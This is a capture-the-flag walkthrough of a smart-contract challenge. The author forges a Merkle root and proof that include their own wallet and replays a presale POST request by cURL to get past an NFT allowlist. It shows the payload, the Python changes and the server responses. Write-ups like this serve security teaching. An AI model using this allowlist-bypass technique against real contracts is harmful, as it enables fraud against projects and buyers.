Exploit a Smart Contract
Difficulty:
Shown in Report
Luigi is standing next to a terminal.
Objective Image
Back
Challenge

Exploit flaws in a smart contract to buy yourself a Bored Sporc NFT. Find hints for this objective hidden throughout the tunnels.

Solution

The The Bored Sporc Rowboat Society web site has three pages:

At first let's do a simple check using the presale page and following information:

Let's look at the web console and we see a POST request to https://boredsporcrowboatsociety.com/cgi-bin/presale with following payload:

{
"WalletID":"0x(yourownaddress)",
"Root":"0x258e841a5cd9a65de7bba00172960e55e985fd29f4143cb5dc866bc29239ae80",
"Proof":"0x083f32bd3c6bdf00d603dbd24cd0165fbfdd8afa09d082950baf6b425b1d0f5b",
"Validate":"true",
"Session":"7819373f-f635-44b1-96b1-65ec01c9426f"
}

So it seems all we need is a valid Merkle Tree, it's Root and a Proof. Let's create one using this repo. The only code changes necessary are (for the other 2 leafs just take a address from the gallery page):

allowlist = ["0xa1861E96DeF10987E1793c8f77E811032069f8E9", "0x(yourownaddress)", "0xc249927fb81bde4eA7B9Dc9e4c9E6F503F147fe2"]
print('Proof:', mt.get_proof(Web3.solidityKeccak(['bytes'], ["0x(yourownaddress)"])))

Run it using docker:

docker build -t merkletrees .
docker run -it --rm --name=merkletrees merkletrees

mt_user@566f02498986:~$ python3 merkle_tree.py
Root: 0x258e841a5cd9a65de7bba00172960e55e985fd29f4143cb5dc866bc29239ae80
Proof: ['0x083f32bd3c6bdf00d603dbd24cd0165fbfdd8afa09d082950baf6b425b1d0f5b']

We'll go back to the web site and copy the original presale call using the deveveloper tools and copy that request as cURL request (saved here as check.sh. We substitute the root and proof in the payload with the values from our python script:

└─$ ./check.sh
{"Response": "You're on the list and good to go! Now... BUY A SPORC!"}

We'll note the society wallet address 0xe8fC6f6a76BE243122E3d01A1c544F87f1264d3a and use a KTM to transfer 100KC. We run the same script with the parameter changed "Validate":"false":

└─$ ./transfer.sh
{"Response": "Success! You are now the proud owner of BSRS Token #000179. You can find more information at https://boredsporcrowboatsociety.com/TOKENS/BSRS179, or check it out in the gallery!<br>Transaction: 0xb44139083a7bdd6181c464b1a31640d4bec2275d0ad9d00c8bf67ff371f5aa07, Block: 61904<br><br>Remember: Just like we planned, tell everyone you know to <u><em>BUY A BoredSporc</em></u>.<br>When general sales start, and the humans start buying them up, the prices will skyrocket, and we all sell at once!<br><br>The market will tank, but we'll all be rich!!!"}

Indeed we have a beautiful Sporc NFT:

2022_merkle_1.png